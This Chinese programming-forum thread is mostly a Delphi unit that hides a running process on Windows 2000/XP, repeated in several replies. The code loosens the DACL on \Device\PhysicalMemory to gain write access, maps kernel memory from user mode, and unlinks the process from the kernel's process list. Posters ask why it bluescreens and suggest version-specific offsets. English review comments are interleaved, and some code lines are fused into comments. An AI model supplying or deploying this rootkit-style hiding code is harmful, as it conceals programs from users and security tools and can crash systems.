这是一个隐藏进程的代码,做成单元引用时,有时蓝屏!
哪位帮看一下
或者哪位有收藏且试用过没问题的隐藏进程代码,请发一下?
      unit HideProcess;interfacefunction MyHideProcess: Boolean;implementationuses
Windows, SysUtils, Variants, Classes, AclAPI, accCtrl;type
// Shared declarations for this unit: native-API types, status codes and globals.
// NTSTATUS is declared as LongInt, i.e. a signed 32-bit status value.
NTSTATUS = LongInt;const
//NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
// Of these two status codes only STATUS_ACCESS_DENIED is tested in this unit.
STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004);
STATUS_ACCESS_DENIED = NTSTATUS($C0000022);
// The OBJ_* flags are declared but never referenced in the unit as posted.
OBJ_INHERIT = $00000002;
OBJ_PERMANENT = $00000010;
OBJ_EXCLUSIVE = $00000020;
OBJ_CASE_INSENSITIVE = $00000040;
OBJ_OPENIF = $00000080;
OBJ_OPENLINK = $00000100;
OBJ_KERNEL_HANDLE = $00000200;
OBJ_VALID_ATTRIBUTES = $000003F2;type
// IO_STATUS_BLOCK is declared but not used by any routine in the unit as posted.
PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;
IO_STATUS_BLOCK = record
Status: NTSTATUS;
FObject: DWORD;
end;PUNICODE_STRING = ^UNICODE_STRING;
// UNICODE_STRING: the record OpenPhysicalMemory hands to RtlInitUnicodeString.
UNICODE_STRING = record
Length: Word;
MaximumLength: Word;
Buffer: PWideChar;
end;POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;
// OBJECT_ATTRIBUTES: filled in field by field in OpenPhysicalMemory and passed to ZwOpenSection.
OBJECT_ATTRIBUTES = record
Length: DWORD;
RootDirectory: Pointer;
ObjectName: PUNICODE_STRING;
Attributes: DWORD;
SecurityDescriptor: Pointer;
SecurityQualityOfService: Pointer;
// The two procedure types below describe the ntdll exports that InitNTDLL resolves at run time.
end;TZwOpenSection = function(SectionHandle: PHandle;
DesiredAccess: ACCESS_MASK;
ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;
TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;
SourceString: PWideChar); stdcall;var
// Entry points assigned by InitNTDLL; nil until then.
RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;
ZwOpenSection: TZwOpenSection = nil;
// Module handle returned by LoadLibrary in InitNTDLL; reset to 0 by CloseNTDLL.
g_hNtDLL: THandle = 0;
// View mapped by OpenPhysicalMemory; callers pass it to LinearToPhys as BaseAddress.
g_pMapPhysicalMemory: Pointer = nil;
// Section handle written by ZwOpenSection in OpenPhysicalMemory.
g_hMPM: THandle = 0;
// g_hMPM2 is never referenced in the unit as posted.
g_hMPM2: THandle = 0;
// OS version record filled in by GetVersionEx in OpenPhysicalMemory.
g_osvi: OSVERSIONINFO;
// Caches the result of YHideProcess for MyHideProcess.
b_hide: Boolean = false;
// InitNTDLL: loads ntdll.dll and stores the addresses of RtlInitUnicodeString and
// ZwOpenSection in the unit-level procedure variables.
// Returns False only when LoadLibrary fails, True otherwise.
// NOTE(review): neither GetProcAddress result is checked, so either variable can
// still be nil when True is returned.
// NOTE(review): as posted, the function header is fused onto the separator comment below.
//---------------------------------------------------------------------------function InitNTDLL: Boolean;
begin
g_hNtDLL := LoadLibrary('ntdll.dll');if 0 = g_hNtDLL then
begin
Result := false;
Exit;
end;RtlInitUnicodeString := GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString');
ZwOpenSection := GetProcAddress(g_hNtDLL, 'ZwOpenSection');Result := True;
end;
// CloseNTDLL: releases the ntdll.dll reference taken by InitNTDLL (if any) and
// resets g_hNtDLL to 0. The two resolved procedure variables are not cleared here.
//---------------------------------------------------------------------------procedure CloseNTDLL;
begin
if (0 <> g_hNtDLL) then
FreeLibrary(g_hNtDLL);
g_hNtDLL := 0;
end;
// SetPhyscialMemorySectionCanBeWrited: rewrites the DACL of the section object behind
// hSection so that the trustee named 'CURRENT_USER' is granted SECTION_MAP_WRITE.
// Steps: read the existing DACL (GetSecurityInfo), merge one GRANT_ACCESS entry into a
// new DACL (SetEntriesInAcl), write the new DACL back (SetSecurityInfo).
// Parameters: hSection - a handle the caller opened with READ_CONTROL or WRITE_DAC.
// NOTE(review): each failure branch only frees buffers and does not Exit, so the
// following calls still run with whatever state the failed call left behind.
// NOTE(review): on the success path pSD and pNewDacl are never freed.
// Defender note: the effect is a changed security descriptor on a kernel object; an
// unexpected write-access entry on this section is an artifact worth auditing for.
//---------------------------------------------------------------------------procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);
var
pDacl: PACL;
pSD: PPSECURITY_DESCRIPTOR;
pNewDacl: PACL;
dwRes: DWORD;
ea: EXPLICIT_ACCESS;
begin
pDacl := nil;
pSD := nil;
// Read the current DACL of the section object.
pNewDacl := nil;dwRes := GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD);if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(HLocal(pNewDacl));
// Describe the single access entry to add: map-write, granted, not inherited.
end;ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions := SECTION_MAP_WRITE;
ea.grfAccessMode := GRANT_ACCESS;
ea.grfInheritance := NO_INHERITANCE;
ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType := TRUSTEE_IS_USER;
// Merge the entry with the existing DACL into pNewDacl.
ea.Trustee.ptstrName := 'CURRENT_USER';dwRes := SetEntriesInAcl(1, @ea, pDacl, pNewDacl);if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(HLocal(pNewDacl));
// Apply the merged DACL to the section object.
end;dwRes := SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil);if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(HLocal(pNewDacl));
end;end;
// OpenPhysicalMemory: opens the '\Device\PhysicalMemory' section for read/write mapping
// and maps one $1000-byte view at a version-dependent physical offset.
// Returns the section handle (also stored in g_hMPM), or 0 when the OS version is not
// 5.0 / 5.1, the open fails, or the view cannot be mapped.
// Side effects: fills g_osvi, sets g_hMPM and g_pMapPhysicalMemory.
// NOTE(review): PhyDirectory is a hard-coded constant per minor version; presumably it is
// the physical address of the table LinearToPhys indexes - confirm.
// NOTE(review): RtlInitUnicodeString and ZwOpenSection are called without a nil check,
// and the status of the READ_CONTROL/WRITE_DAC open in the retry path is ignored.
// Defender note: a user-mode open of this section for write, or for WRITE_DAC followed
// by a DACL change, is the precondition for everything else in this unit. Windows
// Server 2003 SP1 and later no longer allow user-mode code to open this section.
//---------------------------------------------------------------------------function OpenPhysicalMemory: THandle;
var
status: NTSTATUS;
physmemString: UNICODE_STRING;
attributes: OBJECT_ATTRIBUTES;
PhyDirectory: DWORD;
begin
g_osvi.dwOSVersionInfoSize := sizeof(OSVERSIONINFO);
// Only major version 5 is accepted.
GetVersionEx(g_osvi);if (5 <> g_osvi.dwMajorVersion) then
begin
Result := 0;
Exit;
// Minor version selects the offset mapped below; any other minor version is rejected.
end;case g_osvi.dwMinorVersion of
0: PhyDirectory := $30000;
1: PhyDirectory := $39000;
else
begin
Result := 0;
Exit;
end;
end;RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory');attributes.Length := SizeOf(OBJECT_ATTRIBUTES);
attributes.RootDirectory := nil;
attributes.ObjectName := @physmemString;
attributes.Attributes := 0;
attributes.SecurityDescriptor := nil;
// First attempt: read/write map access. On ACCESS_DENIED, reopen with rights to edit the
// DACL, grant map-write to the current user, then retry the read/write open.
attributes.SecurityQualityOfService := nil;status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);if (status = STATUS_ACCESS_DENIED) then
begin
ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
// Same test as the NT_SUCCESS macro quoted in the const section: status >= 0.
end;if not (LongInt(status) >= 0) then
begin
Result := 0;
Exit;
// Map one page of physical memory at offset PhyDirectory.
end;g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,
FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);if (g_pMapPhysicalMemory = nil) then
begin
Result := 0;
Exit;
end;Result := g_hMPM;
end;
//---------------------------------------------------------------------------

解决方案 »

  1.   

    // LinearToPhys: translates the virtual address addr to a physical address by walking
    // the table mapped at BaseAddress (callers pass g_pMapPhysicalMemory).
    // The code assumes 4-byte entries: bits 31..22 of addr index the first-level table,
    // bit 0 of an entry is treated as "present" and bit $80 as "large page".
    // Returns the physical address as a Pointer, or nil when an entry's bit 0 is clear.
    // NOTE(review): the MapViewOfFile result is dereferenced without a nil check, and the
    // Exit taken when the second-level entry is not present leaves that view mapped.
    // NOTE(review): as posted, each `if` after "modify by dot." is fused into the trailing comment.
    function LinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer;
    var
    VAddr, PGDE, PTE, PAddr, tmp: DWORD;
    begin
    VAddr := DWORD(addr);
    // PGDE := BaseAddress[VAddr shr 22];
    PGDE := PULONG(DWORD(BaseAddress) + (VAddr shr 22) * SizeOf(ULONG))^; // modify by dot.if 0 = (PGDE and 1) then
    begin
    Result := nil;
    Exit;
    end;tmp := PGDE and $00000080;if (0 <> tmp) then
    begin
    // Large-page case: upper 10 bits come from the entry, lower 22 bits from the address.
    PAddr := (PGDE and $FFC00000) + (VAddr and $003FFFFF);
    end
    else
    begin
    // Map the second-level table page; the literal 4 is the numeric value of FILE_MAP_READ.
    PGDE := DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000));
    // PTE := (PDWORD(PGDE))[(VAddr and $003FF000) shr 12];
    PTE := PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * SizeOf(DWord))^; // modify by dot.if (0 = (PTE and 1)) then
    begin
    Result := nil;
    Exit;
    end;PAddr := (PTE and $FFFFF000) + (VAddr and $00000FFF);
    UnmapViewOfFile(Pointer(PGDE));
    end;Result := Pointer(PAddr);
    end;
    // GetData: reads one DWORD from the virtual address addr by translating it with
    // LinearToPhys, mapping the containing physical page from g_hMPM, and reading at the
    // in-page offset rounded down to a 4-byte boundary.
    // Returns the value read, or 0 when the page cannot be mapped (indistinguishable from
    // a stored 0).
    // NOTE(review): a nil result from LinearToPhys is not checked; phys then becomes 0 and
    // the read is taken from physical page 0.
    //---------------------------------------------------------------------------function GetData(addr: Pointer): DWORD;
    var
    phys, ret: DWORD;
    tmp: PDWORD;
    begin
    phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
    tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0,
    phys and $FFFFF000, $1000));if (nil = tmp) then
    begin
    Result := 0;
    Exit;
    end;// ret := tmp[(phys and $FFF) shr 2];
    ret := PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^; // modify by dot.
    UnmapViewOfFile(tmp);Result := ret;
    end;
    // SetData: writes the DWORD data to the virtual address addr by translating it with
    // LinearToPhys, mapping the containing physical page from g_hMPM for write, and
    // storing at the in-page offset rounded down to a 4-byte boundary.
    // Returns False when the page cannot be mapped, True after the store.
    // NOTE(review): a nil result from LinearToPhys is not checked; phys then becomes 0 and
    // the store lands in physical page 0.
    // NOTE(review): the store is made from user mode with no synchronisation against
    // whatever else is using that memory.
    //---------------------------------------------------------------------------function SetData(addr: Pointer; data: DWORD): Boolean;
    var
    phys: DWORD;
    tmp: PDWORD;
    begin
    phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
    tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000));if (nil = tmp) then
    begin
    Result := false;
    Exit;
    end;// tmp[(phys and $FFF) shr 2] := data;
    PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^ := data; // modify by dot.
    UnmapViewOfFile(tmp);Result := TRUE;
    end;
    //---------------------------------------------------------------------------
    {long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
    begin
    ExitProcess(0);
    return 1 ;
    end }
    // YHideProcess: after InitNTDLL and OpenPhysicalMemory succeed, reads a pointer from the
    // fixed address $FFDFF124 (marked "kteb" by the author), follows the pointer at +$44
    // (marked "kpeb"), then reads two adjacent DWORDs at a version-dependent offset
    // ($A0/$A4 for minor version 0, $88/$8C for minor version 1) and uses them as the
    // forward (fw) and backward (bw) links of a doubly linked list: it stores bw at fw+4
    // and fw at bw, so the two neighbouring entries skip this one.
    // Returns True once the two writes have been issued, False on setup failure or an
    // unsupported minor version.
    // NOTE(review): presumably this is the list that process enumeration walks. Only these
    // two pointers change, so anything that finds processes by another route is unaffected
    // and a cross-view comparison exposes the gap.
    // NOTE(review): the writes target live kernel data through a user-mode mapping with no
    // locking, and every address and offset is a hard-coded constant; the bluescreens
    // reported in this thread are consistent with that.
    // NOTE(review): GetData returns 0 on failure and SetData's result is ignored, so a
    // failed read is not detected before the writes.
    // NOTE(review): the early Exit paths skip CloseHandle/CloseNTDLL, and the view held in
    // g_pMapPhysicalMemory is never unmapped in this unit.
    // NOTE(review): as posted, the `if` after "//kpeb" is fused into that trailing comment.
    //---------------------------------------------------------------------------function YHideProcess: Boolean;
    var
    thread, process: DWORD;
    fw, bw: DWORD;
    begin
    // SetUnhandledExceptionFilter(exeception);
    if (FALSE = InitNTDLL) then
    begin
    Result := FALSE;
    Exit;
    end;if (0 = OpenPhysicalMemory) then
    begin
    Result := FALSE;
    Exit;
    end;thread := GetData(Pointer($FFDFF124)); //kteb
    process := GetData(Pointer(thread + $44)); //kpebif (0 = g_osvi.dwMinorVersion) then
    begin
    fw := GetData(Pointer(process + $A0));
    bw := GetData(Pointer(process + $A4));SetData(Pointer(fw + 4), bw);
    SetData(Pointer(bw), fw);Result := TRUE;
    end
    else if (1 = g_osvi.dwMinorVersion) then
    begin
    fw := GetData(Pointer(process + $88));
    bw := GetData(Pointer(process + $8C));SetData(Pointer(fw + 4), bw);
    SetData(Pointer(bw), fw);Result := TRUE;
    end
    else
    begin
    Result := False;
    end;CloseHandle(g_hMPM);
    CloseNTDLL;
    // MyHideProcess: the unit's only exported routine. Calls YHideProcess until it has
    // returned True once, caches that in b_hide, and returns the cached value.
    end;function MyHideProcess: Boolean;
    begin
    if not b_hide then
    begin
    b_hide := YHideProcess;
    end;Result := b_hide;
    end;end.
      

  2.   

    HideProcess是隐藏进程的代码單元,我之前使用時沒有出現過類似的問題,不知道LZ在調試時在哪部分出現問題,請貼出相關代碼!
      

  3.   


    用法:implementationuses HideProcess;过程调用begin
        MyHideProcess;....
    end;
      

  4.   

    代码太长了
    你Debug的时候 到底哪有错呢?
      

  5.   

    加一个 
    Refresh; 
    进去
      

  6.   

    我用過不會出現類似情況,給你我所用的代碼,應該是一樣的吧,你有在多台電腦上測試嗎?有沒有可能是你電腦的問題!
    type
      NTSTATUS = LongInt;
    const
      STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004);
      STATUS_ACCESS_DENIED = NTSTATUS($C0000022);
      OBJ_INHERIT = $00000002;
      OBJ_PERMANENT = $00000010;
      OBJ_EXCLUSIVE = $00000020;
      OBJ_CASE_INSENSITIVE = $00000040;
      OBJ_OPENIF = $00000080;
      OBJ_OPENLINK = $00000100;
      OBJ_KERNEL_HANDLE = $00000200;
      OBJ_VALID_ATTRIBUTES = $000003F2;type
      PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;
      IO_STATUS_BLOCK = record
        Status: NTSTATUS;
        FObject: DWORD;
      end;  PUNICODE_STRING = ^UNICODE_STRING;
      UNICODE_STRING = record
        Length: Word;
        MaximumLength: Word;
        Buffer: PWideChar;
      end;  POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;
      OBJECT_ATTRIBUTES = record
        Length: DWORD;
        RootDirectory: Pointer;
        ObjectName: PUNICODE_STRING;
        Attributes: DWORD;
        SecurityDescriptor: Pointer;
        SecurityQualityOfService: Pointer;
      end;  TZwOpenSection = function(SectionHandle: PHandle;
        DesiredAccess: ACCESS_MASK;
        ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;
      TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;
        SourceString: PWideChar); stdcall;var
      RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;
      ZwOpenSection: TZwOpenSection = nil;
      g_hNtDLL: THandle = 0;
      g_pMapPhysicalMemory: Pointer = nil;
      g_hMPM: THandle = 0;
      g_hMPM2: THandle = 0;
      g_osvi: OSVERSIONINFO;
      b_hide: Boolean = false;
    // InitNTDLL: loads ntdll.dll and stores the addresses of RtlInitUnicodeString and
    // ZwOpenSection in the two procedure variables declared above.
    // Returns False only when LoadLibrary fails, True otherwise.
    // NOTE(review): neither GetProcAddress result is checked for nil.
    //---------------------------------------------------------------------------function InitNTDLL: Boolean;
    begin
      g_hNtDLL := LoadLibrary('ntdll.dll');  if 0=g_hNtDLL then
      begin
        Result:=false;
        Exit;
      end;  RtlInitUnicodeString:=GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString');
      ZwOpenSection:=GetProcAddress(g_hNtDLL, 'ZwOpenSection');  Result:=True;
    end;
    // CloseNTDLL: frees the ntdll.dll module handle held in g_hNtDLL (if non-zero) and
    // resets it to 0.
    //---------------------------------------------------------------------------procedure CloseNTDLL;
    begin
      if (0 <> g_hNtDLL) then
        FreeLibrary(g_hNtDLL);
      g_hNtDLL := 0;
    end;
    // SetPhyscialMemorySectionCanBeWrited: reads the DACL of the section behind hSection,
    // merges in one entry granting SECTION_MAP_WRITE to the trustee 'CURRENT_USER', and
    // writes the merged DACL back.
    // NOTE(review): the failure branches free buffers but do not Exit, so later calls
    // still run after an earlier one failed; nothing is freed on the success path.
    // Defender note: the result is a modified security descriptor on a kernel object,
    // which is an auditable artifact.
    //---------------------------------------------------------------------------procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);
    var
      pDacl:PACL;
      pSD:PPSECURITY_DESCRIPTOR;
      pNewDacl:PACL;
      dwRes:DWORD;
      ea:EXPLICIT_ACCESS;
    begin
      pDacl:=nil;
      pSD:=nil;
      pNewDacl:=nil;  dwRes:=GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD);  if ERROR_SUCCESS <> dwRes then
      begin
        if Assigned(pSD) then
          LocalFree(Hlocal(pSD^));
        if Assigned(pNewDacl) then
          LocalFree(HLocal(pNewDacl));
      end;  ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
      ea.grfAccessPermissions:=SECTION_MAP_WRITE;
      ea.grfAccessMode:=GRANT_ACCESS;
      ea.grfInheritance:=NO_INHERITANCE;
      ea.Trustee.TrusteeForm:=TRUSTEE_IS_NAME;
      ea.Trustee.TrusteeType:=TRUSTEE_IS_USER;
      ea.Trustee.ptstrName:='CURRENT_USER';  dwRes:=SetEntriesInAcl(1, @ea, pDacl, pNewDacl);  if ERROR_SUCCESS <> dwRes then
      begin
        if Assigned(pSD) then
          LocalFree(Hlocal(pSD^));
        if Assigned(pNewDacl) then
          LocalFree(HLocal(pNewDacl));
      end;  dwRes := SetSecurityInfo  (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil);  if ERROR_SUCCESS <> dwRes then
      begin
        if Assigned(pSD) then
          LocalFree(Hlocal(pSD^));
        if Assigned(pNewDacl) then
          LocalFree(HLocal(pNewDacl));
      end;end;
    // OpenPhysicalMemory: opens the '\Device\PhysicalMemory' section for read/write mapping
    // (editing its DACL first if the open is denied) and maps one $1000-byte view at a
    // version-dependent offset into g_pMapPhysicalMemory.
    // Returns the section handle, or 0 when the OS is not version 5.0 / 5.1, the open
    // fails, or the view cannot be mapped.
    // NOTE(review): PhyDirectory is hard-coded per minor version; minor version 2 is
    // rejected here with Result 0.
    // Defender note: Windows Server 2003 SP1 and later no longer allow user-mode code to
    // open this section; on older systems the open-for-write (or the WRITE_DAC open that
    // precedes a DACL change) is the event to look for.
    //---------------------------------------------------------------------------function OpenPhysicalMemory: THandle;
    var
      status:NTSTATUS;
      physmemString:UNICODE_STRING;
      attributes:OBJECT_ATTRIBUTES;
      PhyDirectory:DWORD;
    begin
      g_osvi.dwOSVersionInfoSize:=sizeof(OSVERSIONINFO);
      GetVersionEx(g_osvi);  if (5 <> g_osvi.dwMajorVersion) then
      begin
        Result:=0;
        Exit;
      end;  case g_osvi.dwMinorVersion of
        0: PhyDirectory := $30000;
        1: PhyDirectory := $39000;
      else
        begin
          Result:=0;
          Exit;
        end;
      end;  RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory');  attributes.Length:=SizeOf(OBJECT_ATTRIBUTES);
      attributes.RootDirectory:=nil;
      attributes.ObjectName:=@physmemString;
      attributes.Attributes:=0;
      attributes.SecurityDescriptor:=nil;
      attributes.SecurityQualityOfService:=nil;  status:=ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);  if (status = STATUS_ACCESS_DENIED) then
      begin
        // Retry path: the status of this first reopen is not checked.
        ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);
        SetPhyscialMemorySectionCanBeWrited(g_hMPM);
        CloseHandle(g_hMPM);    status:=ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
      end;  if not (LongInt(status) >= 0) then
      begin
        Result:=0;
        Exit;
      end;  g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,
        FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);  if (g_pMapPhysicalMemory = nil) then
      begin
        Result:=0;
        Exit;
      end;  Result:=g_hMPM;
    end;
    // LinearToPhys: translates the virtual address addr to a physical address by walking
    // the table mapped at BaseAddress. The code assumes 4-byte entries: bits 31..22 of addr
    // index the first level, bit 0 of an entry is treated as "present", bit $80 as
    // "large page"; otherwise a second-level page is mapped and indexed by bits 21..12.
    // Returns the physical address as a Pointer, or nil when an entry's bit 0 is clear.
    // NOTE(review): the MapViewOfFile result is dereferenced without a nil check, and the
    // Exit taken on a not-present second-level entry leaves that view mapped.
    //---------------------------------------------------------------------------function LinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer;
    var
      VAddr,PGDE,PTE,PAddr,tmp:DWORD;
    begin
      VAddr:=DWORD(addr);
      PGDE:=PULONG(DWORD(BaseAddress) + (VAddr shr 22) * SizeOf(ULONG))^; // Modify by dot.  if 0 = (PGDE and 1) then
      begin
        Result:=nil;
        Exit;
      end;  tmp := PGDE and $00000080;  if (0 <> tmp) then
      begin
        PAddr:=(PGDE and $FFC00000) + (VAddr and $003FFFFF);
      end
      else
      begin
        // The literal 4 is the numeric value of FILE_MAP_READ.
        PGDE:=DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000));
        PTE:=PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * SizeOf(DWord))^; // Modify by dot.    if (0 = (PTE and 1)) then
        begin
          Result:=nil;
          Exit;
        end;    PAddr:=(PTE and $FFFFF000) + (VAddr and $00000FFF);
        UnmapViewOfFile(Pointer(PGDE));
      end;  Result:=Pointer(PAddr);
    end;
    // GetData: reads one DWORD at the virtual address addr by translating it with
    // LinearToPhys, mapping the containing physical page from g_hMPM and reading at the
    // in-page offset rounded down to a 4-byte boundary.
    // Returns the value read, or 0 when the page cannot be mapped.
    // NOTE(review): a nil result from LinearToPhys is not checked; phys is then 0.
    //---------------------------------------------------------------------------function GetData(addr: Pointer): DWORD;
    var
      phys,ret:DWORD;
      tmp:PDWORD;
    begin
      phys:=ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
      tmp:=PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0,
        phys and $FFFFF000, $1000));  if (nil=tmp) then
      begin
        Result:=0;
        Exit;
      end;//  ret:=tmp[(phys and $FFF) shr 2];
      ret:=PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^; // Modify by dot.
      UnmapViewOfFile(tmp);  Result:=ret;
    end;
    //---------------------------------------------------------------------------
      

  7.   


    // SetData: writes the DWORD data at the virtual address addr by translating it with
    // LinearToPhys, mapping the containing physical page from g_hMPM for write and storing
    // at the in-page offset rounded down to a 4-byte boundary.
    // Returns False when the page cannot be mapped, True after the store.
    // NOTE(review): a nil result from LinearToPhys is not checked; phys is then 0 and the
    // store lands in physical page 0.
    function SetData(addr: Pointer; data: DWORD): Boolean;
    var
      phys:DWORD;
      tmp:PDWORD;
    begin
      phys:=ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
      tmp:=PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000));  if (nil = tmp) then
      begin
        Result:=false;
        Exit;
      end;//  tmp[(phys and $FFF) shr 2] := data;
      PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^:=data; // Modify by dot.
      UnmapViewOfFile(tmp);  Result := TRUE;
    end;
    //---------------------------------------------------------------------------
    {long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
    begin
     ExitProcess(0);
     return 1 ;
    end }
    // YHideProcess: after InitNTDLL and OpenPhysicalMemory succeed, reads a pointer from the
    // fixed address $FFDFF124 ("kteb"), follows the pointer at +$44 ("kpeb"), reads two
    // DWORDs at an offset chosen by g_osvi.dwMinorVersion and uses them as the forward (fw)
    // and backward (bw) links of a doubly linked list: bw is stored at fw+4 and fw at bw,
    // so the neighbouring entries skip this one.
    // Returns True once the two writes have been issued, False otherwise.
    // NOTE(review): OpenPhysicalMemory in this listing returns 0 for any minor version other
    // than 0 or 1 and this function exits on 0, so the minor-version-2 branch cannot be
    // reached as written. Its offsets ($8A/$8E) are also not 4-byte aligned, unlike the
    // other two pairs.
    // NOTE(review): only two pointers are changed, so an enumeration that does not rely on
    // this list still sees the process; comparing the two views exposes the difference.
    // NOTE(review): the writes hit live kernel data from user mode with no locking and with
    // hard-coded addresses; GetData failures (0) and SetData results are not checked.
    //---------------------------------------------------------------------------function YHideProcess:Boolean;
    var
      thread,process:DWORD;
      fw,bw:DWORD;
    begin
    //  SetUnhandledExceptionFilter(exeception);
      if (FALSE=InitNTDLL) then
      begin
        Result:=FALSE;
        Exit;
      end;  if (0 = OpenPhysicalMemory) then
      begin
        Result:=FALSE;
        Exit;
      end;  thread:=GetData(Pointer($FFDFF124)); //kteb
      process:=GetData(Pointer(thread + $44)); //kpeb  if (0 = g_osvi.dwMinorVersion) then       //win2000
      begin
        fw:=GetData(Pointer(process + $A0));
        bw:=GetData(Pointer(process + $A4));
        SetData(Pointer(fw + 4), bw);
        SetData(Pointer(bw), fw);
        Result:=TRUE;
      end
      else if (1 = g_osvi.dwMinorVersion) then   //winXP
      begin
        fw:=GetData(Pointer(process + $88));
        bw:=GetData(Pointer(process + $8C));    SetData(Pointer(fw + 4),bw);
        SetData(Pointer(bw),fw);
        Result:=TRUE;
      end
      else if (2 = g_osvi.dwMinorVersion) then   //win2003
      begin
        fw:=GetData(Pointer(process + $8A));
        bw:=GetData(Pointer(process + $8E));    SetData(Pointer(fw + 4), bw);
        SetData(Pointer(bw), fw);
        Result:=TRUE;
      end
      else
      begin
        Result:=False;
      end;
      CloseHandle(g_hMPM);
      CloseNTDLL;
    // HideProcess: calls YHideProcess until it has returned True once, caches that in
    // b_hide, and returns the cached value.
    end;function HideProcess:Boolean;
    begin
      if not b_hide then
      begin
        b_hide:=YHideProcess;
      end;
      Result:=b_hide;
    end;
      

  8.   

    zhao_yong 谢谢,好像真是一样的!
    我的电脑绝对不会有问题的!
    我只在我的实机和虚拟机中测试,结果都是蓝屏
    实机和虚拟机是xp系统
      

  9.   


    很多时候是版本的不同
    else if (1 = g_osvi.dwMinorVersion) then   //winXP
      

  10.   

    写内存??……………………
    每个XP版本的内存偏移地址是不同的,如果是SP2,这个地址不会和原版或者SP1相同,你这个代码估计是用错版本了,上网多找几个试试,或者就用zhao_yong的办法
      

  11.   

    zhao_yong的代码报错?
    unit HideProcess;interfacefunction MyHideProcess: Boolean;implementationuses
    Windows, SysUtils, Variants, Classes, AclAPI, accCtrl;type
      NTSTATUS = LongInt;
    const
      STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004);
      STATUS_ACCESS_DENIED = NTSTATUS($C0000022);
      OBJ_INHERIT = $00000002;
      OBJ_PERMANENT = $00000010;
      OBJ_EXCLUSIVE = $00000020;
      OBJ_CASE_INSENSITIVE = $00000040;
      OBJ_OPENIF = $00000080;
      OBJ_OPENLINK = $00000100;
      OBJ_KERNEL_HANDLE = $00000200;
      OBJ_VALID_ATTRIBUTES = $000003F2;type
      PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;
      IO_STATUS_BLOCK = record
        Status: NTSTATUS;
        FObject: DWORD;
      end;  PUNICODE_STRING = ^UNICODE_STRING;
      UNICODE_STRING = record
        Length: Word;
        MaximumLength: Word;
        Buffer: PWideChar;
